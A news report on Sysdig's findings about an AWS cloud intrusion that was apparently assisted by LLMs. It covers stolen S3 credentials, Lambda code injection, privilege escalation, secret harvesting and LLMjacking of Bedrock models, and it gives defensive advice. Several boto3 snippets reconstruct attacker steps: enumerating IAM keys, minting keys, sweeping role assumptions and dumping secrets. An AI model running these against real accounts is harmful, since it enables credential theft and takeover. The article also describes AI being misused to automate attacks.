UPDATED A digital intruder broke into an AWS cloud environment and in just under 10 minutes went from initial access to administrative privileges, thanks to an AI speed assist.
The Sysdig Threat Research Team said they observed the break-in on November 28, and noted it stood out not only for its speed, but also for the “multiple indicators” suggesting the criminals used large language models to automate most phases of the attack, from reconnaissance and privilege escalation to lateral movement, malicious code writing, and LLMjacking – using a compromised cloud account to access cloud-hosted LLMs.
“The threat actor achieved administrative privileges in under 10 minutes, compromised 19 distinct AWS principals, and abused both Bedrock models and GPU compute resources,” Sysdig’s threat research director Michael Clark and researcher Alessandro Brucato said in a blog post about the cloud intrusion. “The LLM-generated code with Serbian comments, hallucinated AWS account IDs, and non-existent GitHub repository references all point to AI-assisted offensive operations.”
The attackers initially gained access by stealing valid test credentials from public Amazon S3 buckets. The credentials belonged to an identity and access management (IAM) user with multiple read and write permissions on AWS Lambda and restricted permissions on AWS Bedrock. One of the buckets also contained Retrieval-Augmented Generation (RAG) data for AI models, which would come in handy later in the attack.
To prevent this type of credential theft, don't leave access keys in public buckets. Sysdig recommends using temporary credentials obtained through IAM roles and, for organizations that insist on issuing long-term credentials to IAM users, rotating those keys periodically.
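By way of illustration, here's a minimal key-rotation sketch using boto3 – the user name is hypothetical, and it assumes the caller holds the relevant iam: permissions:

import boto3

iam = boto3.client("iam")
USER = "s3-test-user"  # hypothetical IAM user whose long-term key is being rotated

# Issue a fresh key pair first, so workloads can cut over before the old key dies
new_key = iam.create_access_key(UserName=USER)["AccessKey"]

# Once consumers have switched over, disable and then delete the old keys
for key in iam.list_access_keys(UserName=USER)["AccessKeyMetadata"]:
    if key["AccessKeyId"] != new_key["AccessKeyId"]:
        iam.update_access_key(UserName=USER, AccessKeyId=key["AccessKeyId"], Status="Inactive")
        iam.delete_access_key(UserName=USER, AccessKeyId=key["AccessKeyId"])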
After unsuccessfully trying usernames typically associated with admin-level privileges, such as "sysadmin" and "netadmin", the attacker ultimately achieved privilege escalation through Lambda function code injection, abusing the compromised user's UpdateFunctionCode and UpdateFunctionConfiguration permissions.
The security sleuths note that the comments in the injected code were written in Serbian – likely a hint at the intruder's origin – and that the code itself listed all IAM users and their access keys, created access keys for a user named "frick", and listed S3 buckets along with their contents.
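We haven't reproduced the payload here, but a rough, hypothetical sketch of the behavior described – written with boto3, and definitely not the attacker's actual code – would look something like this:

import boto3

def lambda_handler(event, context):
    # Hypothetical sketch of the behavior Sysdig described, not the real payload
    iam = boto3.client("iam")
    s3 = boto3.client("s3")
    loot = {"users": [], "buckets": []}

    # Enumerate every IAM user and the access keys attached to each
    for user in iam.list_users()["Users"]:
        keys = iam.list_access_keys(UserName=user["UserName"])["AccessKeyMetadata"]
        loot["users"].append({"name": user["UserName"],
                              "keys": [k["AccessKeyId"] for k in keys]})

    # Mint a fresh access key for the "frick" user
    loot["frick"] = iam.create_access_key(UserName="frick")["AccessKey"]["AccessKeyId"]

    # List buckets and a capped sample of their contents
    for bucket in s3.list_buckets()["Buckets"]:
        objects = s3.list_objects_v2(Bucket=bucket["Name"], MaxKeys=50)
        loot["buckets"].append({"name": bucket["Name"],
                                "keys": [o["Key"] for o in objects.get("Contents", [])]})
    return loot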
Code writing for LLMs 101
The attacker's code also contained "comprehensive" exception handling, according to the researchers, including logic to limit the size of S3 bucket listings, and the attacker bumped the Lambda execution timeout from three seconds to 30 seconds.
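That timeout bump is a single Lambda API call; a sketch, with a hypothetical function name:

import boto3

# Raise the function's execution timeout so longer-running code can finish
# (three seconds is the default for new Lambda functions)
boto3.client("lambda").update_function_configuration(
    FunctionName="compromised-function",  # hypothetical name
    Timeout=30,
)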
These factors, combined with the short time from credential theft to Lambda execution, “strongly suggest” the code was written by an LLM, according to the threat hunters.
Next, the miscreant set about collecting account IDs and attempting to assume the OrganizationAccountAccessRole in every AWS account they could reach. Interestingly, they included account IDs that did not belong to the victim organization: two with ascending and descending digits (123456789012 and 210987654321), and one ID that appeared to belong to a legitimate external account.
“This behavior is consistent with patterns often attributed to AI hallucinations, providing further potential evidence of LLM-assisted activity,” Clark and Brucato wrote.
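A sketch of that role-assumption sweep – the first two account IDs are the fabricated ones actually observed, while 111122223333 stands in for a genuine victim account:

import boto3
from botocore.exceptions import ClientError

sts = boto3.client("sts")
for account_id in ["123456789012", "210987654321", "111122223333"]:
    try:
        sts.assume_role(
            RoleArn=f"arn:aws:iam::{account_id}:role/OrganizationAccountAccessRole",
            RoleSessionName="recon",
        )
        print(account_id, "assumed OK")
    except ClientError as err:
        print(account_id, "failed:", err.response["Error"]["Code"])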
In total, the attacker gained access to 19 AWS identities, including six different IAM roles across 14 sessions, plus five other IAM users. And then, with the new admin user account they had created, the crims snarfed up a ton of sensitive data: secrets from Secrets Manager, SSM parameters from EC2 Systems Manager, CloudWatch logs, Lambda function source code, internal data from S3 buckets, and CloudTrail events.
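None of that harvesting requires anything fancy – it boils down to routine read calls against each service, along these lines (the function name is hypothetical):

import boto3

# One representative read call per service the attacker reportedly harvested
secrets = boto3.client("secretsmanager").list_secrets()["SecretList"]
params = boto3.client("ssm").describe_parameters()["Parameters"]
log_groups = boto3.client("logs").describe_log_groups()["logGroups"]
events = boto3.client("cloudtrail").lookup_events(MaxResults=50)["Events"]
# get_function returns a pre-signed URL for downloading the deployment package
fn = boto3.client("lambda").get_function(FunctionName="compromised-function")
code_url = fn["Code"]["Location"]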
LLMjacking attacks
They then turned to the LLMjacking part of the attack to gain access to the victim’s cloud-hosted LLMs. For this, they abused the user’s Amazon Bedrock access to invoke multiple models including Claude, DeepSeek, Llama, Amazon Nova Premier, Amazon Titan Image Generator, and Cohere Embed.
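Invoking a Bedrock-hosted model with stolen keys takes nothing more exotic than the standard runtime API; a sketch using one Claude model ID and the Anthropic messages format:

import boto3, json

bedrock = boto3.client("bedrock-runtime", region_name="us-east-1")
response = bedrock.invoke_model(
    modelId="anthropic.claude-3-sonnet-20240229-v1:0",
    body=json.dumps({
        "anthropic_version": "bedrock-2023-05-31",
        "max_tokens": 256,
        "messages": [{"role": "user", "content": "hello"}],
    }),
)
print(json.loads(response["body"].read()))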
Sysdig notes that “invoking Bedrock models that no one in the account uses is a red flag,” and enterprises can create Service Control Policies (SCPs) to allow only certain models to be invoked.
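A sketch of such an SCP, denying invocation of anything outside an approved model family (the allow-listed ARN pattern is illustrative):

import boto3, json

# Deny Bedrock invocation for any model outside the approved allow-list
scp = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Deny",
        "Action": ["bedrock:InvokeModel", "bedrock:InvokeModelWithResponseStream"],
        "NotResource": "arn:aws:bedrock:*::foundation-model/anthropic.claude-*",
    }],
}
boto3.client("organizations").create_policy(
    Name="bedrock-model-allowlist",
    Description="Only approved Bedrock models may be invoked",
    Type="SERVICE_CONTROL_POLICY",
    Content=json.dumps(scp),
)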
After Bedrock, the intruder focused on EC2, querying machine images suitable for deep learning applications. They also began using the victim's S3 bucket for storage, and one of the scripts stored there looks as if it was designed for ML training – but it references a GitHub repository that doesn't exist, suggesting an LLM hallucinated the repo while generating the code.
While the researchers say they can’t determine the attacker’s goal – possibly model training or reselling compute access – they note that the script launches a publicly accessible JupyterLab server on port 8888, providing a backdoor to the instance that doesn’t require AWS credentials.
However, the attacker terminated the instance after five minutes, for reasons unknown.
This is the latest example of attackers increasingly relying on AI at almost every stage of the attack chain, and some security chiefs have warned that it's only a matter of time before criminals can fully automate attacks at scale.
There are things organizations can do to defend against similar intrusions, and most involve hardening identity security and access management. First off: apply the principle of least privilege to all IAM users and roles.
Sysdig also recommends restricting the UpdateFunctionConfiguration and PassRole permissions in Lambda, limiting UpdateFunctionCode permissions to specific functions, and assigning them only to identities that need code-deployment capabilities to do their jobs – something along the lines of the sketch below.
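A scoped policy of that sort might look like this, with hypothetical account and function ARNs:

import boto3, json

# Allow code deployment only to the two named functions, nothing else
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": "lambda:UpdateFunctionCode",
        "Resource": [
            "arn:aws:lambda:us-east-1:111122223333:function:deploy-target-a",
            "arn:aws:lambda:us-east-1:111122223333:function:deploy-target-b",
        ],
    }],
}
boto3.client("iam").create_policy(
    PolicyName="scoped-lambda-deploy",
    PolicyDocument=json.dumps(policy),
)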
Also, make sure S3 buckets containing sensitive data, including RAG data and AI model artifacts, are not publicly accessible.
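S3's public access block settings shut that door at the bucket level; a sketch with a hypothetical bucket name:

import boto3

# Block every form of public access on a sensitive bucket
boto3.client("s3").put_public_access_block(
    Bucket="rag-training-data",  # hypothetical bucket name
    PublicAccessBlockConfiguration={
        "BlockPublicAcls": True,
        "IgnorePublicAcls": True,
        "BlockPublicPolicy": True,
        "RestrictPublicBuckets": True,
    },
)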
And it’s a good idea to enable model invocation logging for Amazon Bedrock to detect unauthorized usage.
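Turning that logging on is one API call; a sketch with a hypothetical log group and IAM role:

import boto3

# Send every Bedrock model invocation to CloudWatch Logs for review
boto3.client("bedrock").put_model_invocation_logging_configuration(
    loggingConfig={
        "cloudWatchConfig": {
            "logGroupName": "/bedrock/invocations",  # hypothetical log group
            "roleArn": "arn:aws:iam::111122223333:role/bedrock-logging",  # hypothetical role
        },
        "textDataDeliveryEnabled": True,
    }
)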
We reached out to Amazon for comment, but they said they wouldn’t be able to get us anything by publication time. We’ll update this story with any relevant information we receive from them. ®
UPDATED AT 02:30 UTC, February 5, to add the following comment sent by AWS.
“AWS services and infrastructure are not affected by this issue, and they operated as designed throughout the incident described,” the company told The Reg by email. “The report describes an account compromised through misconfigured S3 buckets. We recommend all customers secure their cloud resources by following security, identity, and compliance best practices, including never opening up public access to S3 buckets or any storage service, least-privilege access, secure credential management, and enabling monitoring services like GuardDuty, to reduce risks of unauthorized activity.”
The cloud giant also wants customers who suspect or become aware of malicious activity within their AWS accounts to check out its guidance for remediating potentially compromised credentials, or to contact AWS Support for assistance.